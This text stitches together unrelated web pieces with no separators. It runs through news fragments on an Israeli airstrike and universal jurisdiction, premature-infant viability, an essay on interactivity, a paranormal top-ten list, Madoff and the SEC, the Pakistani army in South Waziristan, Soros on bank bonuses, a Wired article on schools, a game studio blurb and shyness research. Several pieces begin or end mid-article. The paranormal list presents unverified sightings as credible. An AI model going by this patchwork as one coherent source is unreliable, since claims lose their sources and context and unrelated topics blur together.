The attack was part of Israel 's policy of " targeted killings " of Palestinian militants it blamed for plotting attacks against it .
At the time , the army expressed regret about the deaths of the 14 civilians , at least eight of them children , killed in addition to Mr Shehada and said they had come about as the result of faulty intelligence .
Britain has adopted the legal principle of " universal jurisdiction " , under which domestic courts in countries around the world can try war crimes suspects , even if the crime took place outside the country and the suspect is not a citizen .
Palestinian campaigners sought Mr Barak 's arrest last week , in connection with Israel 's controversial military operation in Gaza in December 2008 and January 2009 , but judges declined to hear the case .
A UN report by international prosecutor Richard Goldstone accused both Israel and Hamas of war crimes .
Israel rejected its findings .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Oct. 29 , 2009  --
In the course of the debate over health care reform , some of the political rhetoric has focused on " rationing " and the idea of how much money can or should be spent on someone at the end of his or her life .
But as care evolves , similar debates may someday surround how much can be spent at life 's beginning .
Few cases illustrate this as starkly as a baby born prematurely at 21 weeks and five days in Britain last month , who died as doctors declined to resuscitate him .
Sarah Capewell , the mother of the deceased infant , started Justice for Jayden , a bid to change the guidelines for early preterm babies in the United Kingdom .
The doctors in the case were following guidelines that establish viability for babies in the U.K. at 22 weeks .
The case has been seized upon by some opponents of nationalized health care in the United States as a reason to avoid it , sparking fears that inevitably " rationing " will mean rationing at both the end and the beginning of life .
Capewell did not respond to a request for comment from ABC News .
To be sure , doctors contacted by ABC News were unanimous in their assessment that Jayden would almost certainly not have survived , even with resuscitation .
" The probability of survival at 22 weeks is effectively zero , " said Dr. F. Sessions Cole , director of the division of newborn medicine at Washington University in St. Louis .
The youngest surviving baby born in the United States was Amillia Taylor , born in 2006 after 21 weeks and six days , but as it was noted at the time , because she was conceived via in vitro fertilization , her actual age was closer to 23 weeks .
But doctors say making determinations of age and viability are not an exact science .
Most babies are born naturally , and so , an exact determination of fetal age often cannot be made , and age does not necessarily tell a doctor exactly how high - functioning a baby will be , particularly since only a few weeks separate a baby who cannot breathe on his or her own from one who can .
" When you have a regular pregnancy , you do n't know exactly what the implantation [ date ] is , " said Dr. Ian Holzman , chief of the division of newborn medicine at the Mount Sinai School of Medicine .
" It 's always an issue when we counsel patients prenatally .
Unless we know for sure the date of implantation , the baby may be a little more mature than we think . "
" Size is part of the issue here , and speed of development , " said Arthur Caplan , director of the center for bioethics at the University of Pennsylvania .
At 21 weeks , he said , a baby usually does n't have much in the way of lungs , and , therefore , cannot breathe even with assistance from a ventilator .
" There 's no rule here about 21 weeks , 22 weeks , 23 weeks , you 've got to take a look at the baby , " he said .
When Reality Trumps Technology
So , in the case of the very premature , the realities of development will trump medical science .
" At that gestational age , the guidelines are probably irrelevant because it 's physically impossible to treat , " said Dr. John Lantos , a professor of pediatrics and associate director of the MacLean Center for clinical medical ethics at the University of Chicago , since the baby 's windpipe cannot be put up to a ventilator .
" It 's not so much a moral decision about whether to treat , it 's more about the limits of technology , " he said .
While he does n't believe Jayden would have survived , Cole said he still feels Capewell was wronged .
" I am sympathetic with this family because I agree with them that these kinds of very difficult decisions need to be [ made with the parents ] , " he said .
" Every one of these decisions is shrouded by the biologic uncertainty of both the dates … and how mature the baby 's lungs are going to be . "
And Lantos asserted that most parents would feel the same way Capewell did .
" If you ask parents , ' do you want your baby to be resuscitated regardless of birth weight or gestational age ? '
Ninety percent of parents say , yes , " said Lantos , citing a 2001 study in the medical journal Pediatrics that looked at the issue .
More Than Survival
Guidelines for extremely premature babies do not exist in the U.S. presently as they do in the U.K .
" Guidelines are general guidelines , and we do n't have laws about it , " said Holzman .
" In the United States now , generally , in most centers , under 23 weeks most neonatologists … do not aggressively attempt to resuscitate and save babies that small . "
Between 23 and 25 weeks , those decisions are typically made with the doctors and the parents .
" There 's not a rule , but local practice , " he said .
But very premature babies face a number of obstacles beyond mere survival .
" The concern in the smallest of babies is that the risk for multiple developmental disabilities and handicaps becomes so high that it might come within the parents ' prerogative not to be aggressive , " said Holzman .
" The totality of the disabilities becomes somewhat concerning between cerebral palsy , mental retardation , deafness , blindness , that we 're not all of one mind yet as to what the right thing to do is . "
He also noted that another reason for the importance of a parent 's involvement is that different parents will have different attitudes toward raising a child with special needs .
" Many appropriately say , ' I 'm happy with whatever child I 'm given , no matter how they are , ' " he said .
" I counsel people trying to have them understand the wide range of possibilities .
There are families who end up feeling their lives are enriched by having a special needs child , and there are other families who can't imagine their life like that .
And I try to figure out who they are . "
Frontiers of Survival
For now , it seems that 22 weeks is around the earliest date at which a baby will survive , although Caplan noted that " if you can find some way to allow the lungs to develop prior to their being there , then you 're going to push that frontier back . "
But when it comes to national guidelines and rationing of care for newborns around that age , doctors say they are unlikely in the U.S. ( Babies after 26 weeks almost always need to be resuscitated , as per a set of federal laws known as the Baby Doe laws . )
For one thing , rationing would have little economic effect .
In 2005 , according to the Institute of Medicine , the total of health care costs for all preterm babies born in the United States was $ 26 billion .
" In the overall scheme of things , the entire expenditures on neonatal intensive care are rounding errors on national expenditures , " said Lantos .
" It would n't be a good place to start if we 're looking at cost containment . "
And this figure represents a total -- not just those babies who were born at the edge of viability .
" We 're talking 1 percent of national health expenditures of all babies , " said Lantos .
" Ninety - nine percent of babies are not in this domain of moral controversy .
If I were advising Congress , and they were given the power to start rationing , I 'd start with old people [ who are terminal ] . "
But even beyond that , there is little to suggest the public would accept it .
" I think babies represent hope , they represent the future , and because they do , because babies are very resilient , " said Cole .
" I think people are less likely to say that resources invested in a baby 's survival are a mistake than they are to say resources invested in a very old person 's survival are a mistake .
" I think it 's possible people will talk about this , but I 'm optimistic that because of the number of resources spent on end of life care for adults and the smaller amount spent [ on newborns ] , it 's unlikely that babies will be a major part of the discussion about curtailing resources at the end of life . "
When historians draw a line around the first decade of this century , they will measure the traffic in text messages , wade through the " have your say " sections on online newspapers , and count the membership of social networking sites – and they will surely conclude that this has been the dawning of the age of interactivity .
Never before have those with media and political power professed themselves to be so interested in our opinions ; never before have we been able to pass on our thoughts so instantly to " friends " and " followers " , who may of course be total strangers .
This is n't simply a technological revolution .
It is a cultural and emotional one , underpinned by a belief that constantly interacting with others is an inherently worthwhile activity .
The owner of this year 's steepest adoption curve , Twitter , is interactivity in its purest form – " what I am doing now " condensed into a text message .
Ten years ago , when the internet was virtually steam - powered , the American academic John Durham Peters wrote a prophetic book called Speaking into the Air : A History of the Idea of Communication .
Peters argued that the ideal of interactivity , the search for instantaneous contact with others , had a long and fraught history in western culture .
He traced it back to St Augustine , for whom the epitome of perfect communication was the angel , a word derived from the Greek for " messenger " .
Unlike us flawed mortals , who might be prone to heretical interpretations of the Bible if left to read it on our own and use our unreliable brains , angels could intuit the will of God directly and communicate it to others instantly .
The aim of modern media , Peters argued , has been to " mimic the angels by mechanical or electronic means " .
In the 19th century new inventions like telegraphy , the telephone and the phonograph had a near - mystical aura .
They were linked in the public mind with the Victorian vogue for mesmerism and telepathy , because they too seemed to fulfil the dream of angelic contact , of pure and direct communication , of breaking down the painful distance between self and other .
" We are in great haste to construct a magnetic telegraph from Maine to Texas , " cautioned Henry Thoreau in Walden , " but Maine and Texas , it may be , have nothing to communicate . "
We behaved , Thoreau wrote , " as if the main object were to talk fast and not to talk sensibly " .
Today 's frantically texting , micro-blogging culture seems to be part of this long and futile search for shared consciousness .
The boast of the social networking sites is that they will allow us to " stay connected " wherever we are , to defeat our tiresome physical and psychological distance from each other through technology .
It is n't only in cyberspace .
In real public spaces the people who run our lives are forever trying to converse with us , in a highly colloquial , intimate tone which has none of the formality we used to associate with official communications .
The writer and humorist Paul Jennings once wrote about how angry his father used to get at the words printed on his ration book : " Your ration book " .
" Whose do they suppose I think it is if it 's got my name on it ? " he would say .
These days he would be angry all the time – at those nagging dot - matrix display boards on motorways ( " Have you got enough fuel ? " ) , the sign at the head of the queue in my local bank that says " Nearly there : thanks for waiting " , and the faux - matey copy printed on crisp packets and smoothie bottles , saying things like " We think this flavour rocks " or " Once opened consume within four days or we 'll come round and get you " .
As someone who makes a living out of teaching and writing , I do find the idea of interactivity appealing .
If only I could commune with others instantly , I would never again endure the pain of being unread , ignored or misunderstood .
How I would love to be one of Star Trek 's Vulcans , those modern versions of Augustine 's angels who can meld their minds with others ; then , instead of struggling over this article , I could simply tip the contents of my brain into yours .
But part of me also feels that there is something control - freakish about the desire for perfectly reciprocal communication .
It takes too little account of human individuality and uniqueness .
" Billions of consciousnesses silt history full , and every one of them the centre of the universe , " wrote the late John Updike in his memoirs .
" What can we do in the face of this unthinkable truth but scream or take refuge in God ? "
We could spend our whole lives texting but there will always be part of us that is infinitely remote .
I wonder if one reason that so much discussion on the blogosphere deteriorates into the humourless taking and giving of offence is that people assume the words printed on the screen are aimed at them personally .
In a culture which values interactivity , it makes a sort of sense to treat every form of communication like a text message .
But not every public statement requires , or merits , a response .
All language is a leap into the dark , with no certainty that we will ever be understood or even heard .
Books get remaindered , blogs remain unread , and tweets fall on deaf ears .
If it were easy to interact with others , no great literature would ever be written .
Shakespeare 's sonnets are unsent letters , addressed to unnamed and shadowy people , or simply spoken into the air and to eternity .
I am not denying that online interaction brings pleasure and convenience to millions , and occasionally to me .
What makes me uneasy is the cult of interactivity as an end in itself , the pursuit of better bandwidth as the route to a more liberated , democratic public sphere in which everyone will be instantly available to everyone else .
In reality , as Peters argued , we only want that kind of intimate contact with family and friends .
In more public contexts , such as the marketplace or the workplace , we often just want to be treated fairly and justly , the same as everyone else – which means impersonally and anonymously .
A proper public sphere is collectively owned and more than the sum total of lots of individual interactions .
Why do so many of us love the strange poetry of the shipping forecast ?
Perhaps because it adheres to the literal sense of the word " broadcast " , which radio borrowed from the farmer 's term for scattering seeds over a wide surface .
The shipping forecast is broadcast to millions of people who , since they are not on ships , are not its intended audience .
For them it has become a comforting , collective ritual which simply forms part of what Ralph Waldo Emerson called the " cumulative intelligence of the universe " .
It does not invite us to email or text our feedback ; it does not care what any of us think as individuals .
And so it belongs to us all .
Most of us are familiar with reports of the paranormal around us – whether we ourselves are believers or sceptics .
Entities such as ghosts , and mysterious animals like Big Foot and Nessie , have always haunted our collective consciousness .
Amongst all the weirdness that purportedly exists in our midst , there are occurrences , which though they may not all be considered new , have earned increasing attention in modern times .
SEE ALSO : 10 Paranormal Events Linked To Mass Tragedies
10 Little Creatures
Ever since the discovery that a hobbit like race actually once existed on the earth , science has been re-examining the possibility that other reported little people may not be entirely mythical .
Putting science aside , there have always been those who insist that small humanoid creatures exist amongst us .
Recent reports of gnome like or elf like creatures sometimes caught unawares in remote locations have been made .
They are often described as being no more than nine inches tall , though with the physical features of a humanoid .
Some of them are said to be very hairy .
In Mexico and the Caribbean , duendes are small gnome like creatures that sometimes invade the space of normal human beings , either to steal food or for more sinister reasons .
Either because of their utter strangeness or some power they possess , they have been said to shock witnesses almost into paralysis until they make their escape .
Of course the relationship to fairies and fairy lore here cannot be ignored .
In Iceland , belief that elves and other little creatures have real abodes beneath the earth is very strong .
People who construct malls and large buildings are sometimes physically impeded from disturbing areas where these little creatures are believed to live , so as not to incur their wrath .
Many Icelanders will claim their beliefs are based on actual sightings of these beings .
So can we dismiss the elves , gnomes , fairies or whatever we like to call the little creatures we grew up reading about in fairytales as mere myth ?
Or are they based on very tangible creatures that still exist , and are sometimes inadvertently witnessed today ?
9 Giant Raptors
Raptors are birds of prey that hunt for food or feed on carrion .
They are usually larger than average birds and have specialised physiology , such as powerful beaks and talons , that help them seize and tear apart their prey .
Eagles , vultures and falcons are all considered types of raptors .
In recent times however , sightings of giant raptor - like birds have been reported .
Disturbed witnesses often describe a raucous cry emitted by the birds .
Wingspan averages have varied between 12 – 18 ft , with the birds ’ height being estimated at around 3 to 5 feet .
Many reports describe the prehistoric appearance of the bird , as well as scaly , lizard - like skin on its legs .
Giant raptors have been spotted in places such as Kansas and Oklahoma , usually in wooded areas or near canyons .
Witnesses have reported the creature having a stench of rotted meat – which would be understandable given its diet .
Raptors have been seen by single witnesses at a time as well as fairly sizable groups of five or more persons .
Like the elusive Big Foot , conclusive evidence of their existence in our modern world is yet to be obtained .
Are they real remnants from an age past that have somehow survived in small numbers today ?
Are they all just “ misinterpretations ” of already known large birds ?
The questions , and the random sightings , continue .
8 Doppelgangers
An enigmatic German derived word , a Doppelganger is basically a person ’s exact double .
Apparently they have been seen since early times , and are sometimes known as a “ Fetch ” .
According to Wikipedia , a vardoger is a double in Norse mythology , who actually precedes a living person , performing their actions in advance .
In modern times paranormal message boards have several posts from persons claiming to have seen someone in one place , only to meet them later and realise the first sighting was impossible .
One woman looking through a large picture window , clearly saw her husband being dropped home by a co-worker .
She went to the door to let him in , only to find no sign of either person or the car outside .
Her husband arrived home hours later , and confirmed that at the time she thought she saw them , he and his colleague were still four hours away from home .
One person was told that he was “ heard ” arriving home with a friend , five minutes before he actually did so .
When he and his partner actually did get home , his waiting friends said their arrival sounded exactly the same , with them making the same noises and even uttering the same words that were heard the first time .
Weird , yet apparently not so uncommon .
A few people even claimed to have undeniably seen themselves , wearing the same clothing – stating that the double looked equally astonished at the sighting .
In folklore , seeing one ’s doppelganger is a harbinger of one ’s death .
Seeing someone else ’s “ fetch ” was also said to portend death .
Such notable persons as Percy Shelley and Abraham Lincoln reported having doppelganger experiences .
Can these experiences all be explained as tricks of the subconscious mind or the easily misled eye ?
7 Time slips
Time slips and Lost Time are unnerving experiences .
They have been surmised to be extraterrestrial encounters , dimensional shifts or even brain strokes .
The most disturbing reports are those correlated by more than one person experiencing the same impossible time jump .
Characteristically , time slips occur when someone sets out on a journey , long or short , along a familiar path which is clearly defined and should take a specific time to complete .
The journey appears normal , except at the end the person realises they have covered a number of miles in an impossibly short space of time .
They are unsettled to find themselves at their destination sometimes hours earlier than possible .
There have even been cases of “ time loss ” , where a person set out on a journey , travelled normally , yet arrived at their destination hours later than explainable .
Where did the missing time go ?
Usually it is only upon arrival that the discrepancy in time is noticed .
Are there dimensional “ warps ” we sometimes inadvertently pass through ?
Could physics someday confirm and explain the existence of these time slips ?
Enough people continue to have these experiences to justify scientific investigation into this phenomenon .
6 The Chupacabra
The Chupacabra has been variously described as a dog - like creature with long canine teeth .
It was first spotted in Puerto Rico in the 1990’s , and has since been sighted in the Americas and Mexico .
Sometimes witnesses report that the animal has a kangaroo like gait .
Its name is derived from the Spanish words for “ goat sucker ” .
This refers to its horrifying ability to creep into livestock farms at night , and literally suck the blood of animals until they die .
Obviously the similarity to vampire lore and the possibility of the animal attacking humans , lead to panic in communities .
What is this weird cryptid ?
Is it really a new animal or , as has been suggested , some kind of starved mutated coyote .
Alleged Chupacabra carcasses have been found and examined , with no real conclusions arrived at .
Reports of exsanguinated livestock corpses , however , appear to have increased in recent times .
Many farmers have adopted armed night time watches hoping to kill this weird predator , before it eventually becomes bolder .
5 PANic in the Woods
The woods are a mysterious place , full of unseen life and fraught with danger for the unwary .
Forests are places of menace in folk and fairy tales .
But in our enlightened modern times , could nature inspire sheer unreasoning panic ?
There are those whose experiences make them certain that nature has an intelligence – and it does n’t always welcome humans .
PANic in the woods has been associated with the mythological Greek God Pan – protector of wild places – whose unseen presence inspires causeless terror .
Victims experience a feeling that there is a powerful , sinister force nearby , and sense imminent danger .
This usually leads the person to flee the area , desperately seeking out civilization .
One curiously common characteristic of PANic , is that people often describe the woods becoming quiet and strange just before the fear starts , except for an unusual , escalating , buzzing sound .
At least one article on the phenomenon has been written for Fortean Times Magazine by Patrick Harpur , called “ Landscapes of Panic ” .
Many other alleged actual experiences of panic have been posted on paranormal forums .
Is there really a spirit of the woods that shuns humanity ?
And if so , is PANic it ’s way of warning us – and fighting back ?
4 Dog Headed Men
Men with the heads of dogs have been reported since ancient times .
Cynocephali were supposed to be a race living in Africa , who cannibalized humans .
But seeing such beings in modern times would seem incredible , yet there have been increasing reports of these creatures .
Most sightings occur at night , though some have happened during daylight hours .
Bizarrely , some have reported the men indifferently walking along main roads , attired normally , except they have the head of a dog .
Most witnesses insist the head is too real in appearance and lifelike motion to be a mask .
Some reports have been more sinister , where the creature has been caught unawares lurking around at night , near woods or the darkness of a backyard .
One night - time jogger reported that a dog headed man kept pace with him as he ran across a field , staying alongside until the petrified man finally made it to his well lit doorway .
There was one report of a DHM seen through a window from outside a house , lurking towards the kitchen .
Other cases describe DHM’s who stand outside at night and look in through windows .
3 Black Stick Men
The black stick man is another entity encountered in modern times .
Not to be confused with the shadow man , incredibly he is even stranger .
Stick men are supposed to look like totally black , thin , stick figure drawings , such as teachers would make in kindergarten .
They have been reported as between average height to impossibly tall .
Their heads are just a black circle with no facial features being discernible .
They are totally two dimensional , without any depth .
Usually they ’ve been sighted walking along roads at night , or at transitional times such as twilight or just before dawn .
Bizarrely , some have reported them wearing what appears to be a top hat .
Their walk is described as a weird “ lolloping ” gait .
They are surprised when actually seen , and have followed unfortunate witnesses on occasion .
Their pace remains leisurely as they approach .
Obviously to be pursued by such an otherworldly creature would be anything but pleasant , and those who have encountered them have been understandably terrified .
So far however , apart from being bizarrely frightening , they have done no physical harm , and ultimately just disappear .
2 Shadow People
What are shadow people ?
No one seems to know for sure , even as sightings of these entities continue to be reported .
Generally they appear as dark , silhouette figures , usually male , who suddenly walk across hallways , through walls , appear in rooms only to disappear again , and sometimes stand looking at a sleeping person only to eventually vanish once the sleeper has awakened .
They have no purpose ; do n’t seem to be harbingers of any sort .
Are they from another dimension ?
The afterlife ?
Whatever they are , they have scared enough people to have drawn some increased attention to their shadowy selves .
1 Black Eyed Kids
It started in 1998 when journalist Brian Bethel gave an account of being approached by two boys as he entered his car .
The boys allegedly asked him for a lift .
He described experiencing a sudden feeling of fear and panic , while at the same time having an overwhelming urge to open the door for the boys .
He then noticed their eyes – they were entirely coal black , with no whites visible .
Bethel drove away in fear even as the teens became more insistent .
Since his story , several reports of encounters with black - eyed children have been recorded .
In one case a woman claimed they asked to be let into her home , becoming agitated when she refused .
Their main characteristics are their completely coal black eyes , their tendency to inspire sudden fear and panic , and their need to be invited into a person ’s space .
The new exhibits consist of 6,157 pages of interviews , letters , e-mail messages , telephone records and other background material gathered during Mr. Kotz ’s 10 - month investigation of how the commission handled , and mishandled , numerous tips and warnings it received about Mr. Madoff over the years .
His full report , released last month , found the agency had received six substantive complaints since 1992  and botched the investigation of every one of them .
He found no evidence of any bribery , collusion or deliberate sabotage of those investigations .
In fact , Mr. Madoff said in the jailhouse interview that , on two occasions , he was certain it was only a matter of days or even hours before he would be caught .
The first time , in 2004 , he assumed the investigators would check his clearinghouse account .
He said he was “ astonished ” that they did not , and theorized that they might have decided against doing so because of his stature in the industry .
“ I ’m very proud of the role I played in the industry , ” he said .
“ Of course I destroyed that now . ”
In Mr. Madoff ’s second close call in 2006 , investigators actually asked for his clearinghouse account number on a Friday afternoon , but then never followed up .
He said he firmly expected the following Monday would bring the curtain down on his crime .
Again , nothing happened .
He recalled thinking at the time : “ After all this , I got away lucky . ”
His investors did not .
According to estimates by a court - appointed trustee who is liquidating his estate , Mr. Madoff ’s crime cost thousands of victims at least $ 21 billion in cash losses , part of the $ 64.8 billion in paper wealth that vanished when his scheme collapsed .
Despite what Mr. Madoff described as the chronic ineptitude of the S.E.C. , he said in the interview that he was “ worried every time ” examiners showed up .
AFP
AFTER descending the jagged heights of South Waziristan , a remote part of Pakistan that borders Afghanistan , Wazir Khan Mehsud reached safety last week with his three small children , 40 other relations and their bundled possessions .
They had come to Dera Ismail Khan , in the “ settled area ” of North - West Frontier Province ( NWFP ) that borders Pakistan 's semi-autonomous tribal belt , to escape an army assault on the local Taliban .
Militants of the Mehsud tribes , these fighters represent one of the most formidable of several tribally based Islamist gangs in north - west Pakistan .
The army now vows to crush them .
Recent acts of terrorism confirm the need for this .
On October 9th a suicide blast in Peshawar , NWFP 's capital , killed 52 people .
On the following two days the army 's headquarters in Rawalpindi were attacked by ten militants , five of them from South Waziristan .
Three were said to be Uzbeks , members of an Islamist group driven from Uzbekistan into Afghanistan and from there , after America 's invasion of 2001 , into South Waziristan .
In a 22 - hour battle , nine militants and 14 others , including a passing brigadier , were killed .
It could have been worse .
The militants at one stage made 22 hostages huddle round a suicide - bomber .
Pakistani commandos shot him dead .
Another teenage suicide - bomber killed 45 people on October 12th in NWFP 's Malakand region , which the army captured from another Taliban gang in May .
And on October 15th roughly 25 militants launched co-ordinated attacks on three police bases in Lahore , as a suicide - bomber drove into a police station in Kohat in the north - west .
All these attacks were probably launched from South Waziristan , long the most hostile of Pakistan 's seven Federally Administered Tribal Areas .
Despite at least three army offensives and peace deals with the Mehsud and other militants , the region has been a jihadist haven , more or less , since 2001 .
Besides the Uzbeks , al - Qaeda and a ragbag of Punjabi jihadist groups are present .
And the Taliban have learned their arts .
A Mehsud commander called Qari Hussain has become famous for training suicide - bombers .
The army reckons that , of over 200 suicide blasts in Pakistan in the past two years , 80 % were launched from South Waziristan .
Since ending its Malakand operation , which it considers a turning - point in a previously undistinguished seven - year campaign , the army has deployed 28,000 troops to blockade the Mehsud 's fief , which has also been bombed .
Over 100,000 people , a third of the population , have fled into NWFP .
Most , given the hospitable way of Pushtuns , have found shelter with relations .
They have no alternative .
Unlike the offensive in Malakand , in which over 200,000 of the 2 m displaced people were allowed sanctuary in refugee camps , this operation provides no shelter for Mehsud fugitives .
For security reasons , the United Nations , which lost five staff when a suicide - bomber attacked an office of the World Food Programme in Islamabad on October 5th , is also absent .
And the army has often prevented local charities from dispensing food aid to the Mehsud refugees , apparently fearing this would be funnelled to the Taliban .
In dusty Dera Ismail Khan , where most of the displaced have been registered , no food has been distributed for a month .
Arriving footsore and broke in Dera Ismail Khan , Wazir Mehsud was dismayed to discover so little to eat , and that his house back in South Waziristan had been flattened in an air raid .
The army is now planning a ground attack on the Mehsud militants .
The terrain is forbidding and , with the winter snows expected next month , so is the weather .
The Mehsud Taliban also seem to be in better shape than the army had hoped .
Their leader , Baitullah Mehsud , was killed in August by an American drone .
He was also the supreme commander of Tehrik - e - Taliban Pakistan , an alliance of 13 Pushtun Taliban groups of which he had been a founder .
On his death a leadership battle ensued , motivated , the army claims , by his lieutenants ' desire to lay hands on a vast fortune that their dead “ emir ” had accrued by extortion and foreign donations .
A 28 - year - old militant , Hakimullah Mehsud , allegedly al - Qaeda 's favourite and a cousin of Qari Hussain , was declared his successor .
But , until this month , when video footage of him was televised , he was thought by foreign and local spies to have been killed in a fight with his chief rival , Waliur Rehman .
Some reports said Mr Rehman , who had been put in charge of South Waziristan , was also dead .
But he was heard on a telephone intercept on October 11th exhorting a follower to pray for success in the Rawalpindi attack .
In another sign of the Taliban 's resilience , the army has had limited success trying to divide them .
The leader of a rival Mehsud Taliban militia , supported by the army , was killed by the genuine article in June .
Having no popular support , its fighters are locked down in Dera Ismail Khan under army protection .
The army seems to have done better in buying off the Taliban belonging to other tribes .
To help keep the Mehsud fighters out of NWFP , it has armed militants of the small Bhittani tribe , despised by the Mehsud .
It also seems confident that it can ensure the neutrality of two powerful Taliban commanders of the Wazir tribe , Mullah Nazir , who controls most of the rest of South Waziristan , and Hafiz Gul Bahadur , in neighbouring North Waziristan .
Despite the almost permanent state of war between the Wazirs and the Mehsud , these commanders forged an alliance with Baitullah Mehsud last February .
And in June , when the army began its operation in South Waziristan , it seemed they might even honour it : Mr Bahadur 's men killed at least 23 soldiers in an ambush .
But the army , which exacted a bloody revenge for that attack , considers this unlikely .
If history means anything , it will have paid hefty bribes to Mr Nazir and Mr Bahadur , with whom it has also previously made peace deals .
In recent days it has showed restraint in repelling attacks by Mehsud and Uzbek militants in North Waziristan , viewing these as an effort to draw Mr Bahadur and his men into the fight .
A longer version of this article appears in The Economist print edition .
The chorus is getting louder .
Spread the word .
Soros in an interview with FT :
The big profits made by some of Wall Street ’s leading banks are ‘ hidden gifts ’ from the state , and taxpayer resentment of such companies is ‘ justified ’ , George Soros , the fund manager , said in an interview with the Financial Times .
‘ Those earnings are not the achievement of risk - takers , ’ Mr Soros said .
‘ These are gifts , hidden gifts , from the government , so I do n’t think that those monies should be used to pay bonuses .
There ’s a resentment which I think is justified . ’
That would push the risk - takers who are good at taking risks out of Goldman Sachs into hedge funds , where they actually belong , because hedge funds take risks with their own capital , not with deposits and not with government guarantees .
© Jim Morin
UPDATE : One point that I do n’t see anyone making is that they said that they were giving him the award primarily for his work to control nuclear proliferation .
That work started long before he became president .
Why does everyone keep assuming that they were only giving him the award for what he has done as president ?
UPDATE 2 : Bono on the Nobel award .
* Illustration : Todd St. John * Earlier this year in midtown Manhattan , a local venture capital firm staged a daylong conference on school reform .
Authors , professors , financiers , and entrepreneurs took over the French Institute 's skylighted penthouse and earnestly discussed how embracing " digital culture " — from deploying videogame - style rewards to encouraging kids to develop online reputations — could completely transform education .
Outsiders were invited to participate via Twitter , and their ideas were projected on the wall .
It was a high - minded , tech - centric affair — until Alex Grodd brought it back to earth .
Although Grodd now runs a site that lets educators share lesson plans , he started out teaching at inner-city middle schools in Atlanta and Boston .
The businesspeople in the room represented a world in which innovation requires disruption .
But Grodd knew their ideas would test poorly with real disrupters : kids in a classroom .
" The driving force in the life of a child , starting much earlier than it used to be , is to be cool , to fit in , " Grodd told the group .
" And pretty universally , it 's cool to rebel . "
In other words , prepare for you and your netbook to be jeered out of the room .
" The best schools , " Grodd told me later , " are able to make learning cool , so the cool kids are the ones who get As .
That 's an art . "
It 's an art that has , for the most part , been lost on educators .
The notion itself seems incredibly daunting — until you look at one maligned subculture in which the smartest members are also the most popular : the geeks .
If you want to reform schools , you 've got to make them geekier .
" Geeks get things done .
They 're possessed .
They can't help themselves , " says Larry Rosenstock , founding principal of eight charter schools in San Diego County collectively called High Tech High .
He has come up with a curriculum that forces kids to embrace their inner geek by pushing them to create .
The walls , desks , and ceilings of his classrooms teem with projects , from field guides on local wildlife to human - powered submarines .
( A High Tech High art project called Calculicious , based entirely on math principles , now hangs in the San Diego airport . )
The students all work in small groups as a way to foster shared enthusiasm :
Get two kids excited about something and it's harder for a third to poke fun at them .
But more important , Rosenstock keeps the students surrounded by adults .
There are no teachers ' bathrooms or lounges .
Parents roam the halls .
And the students are required to present their work to outsiders .
This , it turns out , is the key to geekifying education .
" A big chunk of the school experience is having them hang out with the adults they could imagine becoming , " says private - equity manager Tom Vander Ark , former head of education investments for the Bill & Melinda Gates Foundation and a onetime school superintendent .
" A big high school has a youth - owned culture .
You 've got to break that . "
The result : One hundred percent of High Tech graduates get into college .
Nationally , the college attendance rate for High Tech High 's demographic — half are eligible for free lunch , and even fewer have parents who attended college — is about 55 percent .
Yet all High Tech students take advanced math and science classes , and many of them end up at universities like MIT and Stanford .
Back on the East Coast , in one of Boston 's toughest neighborhoods , Roxbury Prep ( where Grodd once taught ) uses a similar formula .
Almost 80 percent of its eighth graders — nearly all of whom come from families earning less than $ 28,000 a year — go to college .
Their teachers work nonstop to stamp out youth culture : Kids eat lunch in the classroom , they 're not allowed to talk in the halls , and they 're disciplined for using the word nerd .
But it 's about the nerdiest school you can imagine ; every week , the faculty awards one child a " spirit stick " — a bedpost painted a rainbow of colors — for good grades .
In the public school I attended , that would be a homing beacon for a beating : " There 's the nerd with the stick .
Jump him ! "
But in geeked - out schools , that would n't happen — because everyone would be a nerd .
At the final spirit - stick ceremony last year , 220 kids erupted in applause as a teacher read aloud the 14 - year - old honoree 's thesis .
It started by calling America an " unfair and superficial nation . "
Hey , kids are going to rebel ; better to have them cheered for doing it with contentious ideas .
Senior writer Daniel Roth ( daniel_roth@wired.com ) wrote about innovation in the wake of the financial crisis in issue 17.07 .
Start Next : American Vice : Mapping the 7 Deadly Sins YouTube in the Classroom
Classroom Clickers Make the Grade
Education 2.0 : Top Online Learning Resources
Welcome to , a collective developer of quality independent games , including acclaimed titles such as Katana ZERO and Tower of Heaven .
In addition to our core members , we rely on the tireless wisdom of the greater gaming community ; you know who you are .
Thank you for playing our games and supporting our cause .へようこそ！ 「 Katana ZERO 」 「 Tower of Heaven ( 天国の塔 ) 」 などで知られているクリエイター達の共同体です。メンバー達の力だけでなく、世界のゲームコミュニティそして遊んでくれる皆様の支援のもとで楽しいモノづくりを心がけています。いつもありがとうございます！
Are and the same thing ?
When I interviewed Wellesley College psychologist Jonathan Cheek , he said it depends on who you ask .
So I next asked Louis A. Schmidt , director of the Child Emotion Laboratory at McMaster University , who studies the biological underpinnings of , especially shyness .
" Though in popular media they 're often viewed as the same , we know in the scientific community that , conceptually or empirically , they 're unrelated , " Schmidt says .
The two get confused because they both are related to socializing - but lack of interest in socializing is very clearly not the same as fearing it .
Schmidt and Arnold H. Buss of the University of Texas wrote a chapter titled " Understanding Shyness " for the upcoming book The Development of Shyness and Social Withdrawal .
There they write , " Sociability refers to the motive , strong or weak , of wanting to be with others , whereas shyness refers to behavior when with others , inhibited or uninhibited , as well as feelings of tension and discomfort . "
This differentiation between and behavior is consistent with the ability many of us have to behave like extroverts when we choose , whereas shy people cannot turn their shyness off and on .
In addition , when Cheek and Buss administered a questionnaire measuring shyness vs. low sociability to 947 college students , they found a very low correlation between shyness and low sociability -- just because you 're shy does n't mean you do n't want to be around people , and vice versa .
( Subsequent measures , with additional items on the shyness scale , showed higher correlations , but the two were still very clearly different . )
In teasing apart various aspects of sociability and shyness , Schmidt and Buss describe introverts as " low on social approach and low on social avoidance . "
So although we do n't pursue interaction , we 're not afraid of it , either .
Like we 've been saying .
And , says Schmidt , " When we look at the interaction between shyness and introversion and treat those as two unrelated dimensions , it 's as though each independent measure is adding unique variants to behavior . "
So someone who is introverted and shy will behave differently from someone who is introverted and not shy , who will behave differently from someone who is and shy , who will behave differently from someone who is extroverted and not shy .
These distinctions help explain the range of behaviors and emotions people describe in the comments on this blog - some people sound bold , some timid , some are comfortable with their attitudes towards socializing , some long to be different .
Schmidt studies children from birth to age 12 and says that there are biological components to both shyness and levels of sociability , although shy children do n't always stay shy .
" There is a degree of malleability , although there are limits to it , " he says .
" We find that more shy children tend to grow out of their shyness than sociable children tending to become shy . "
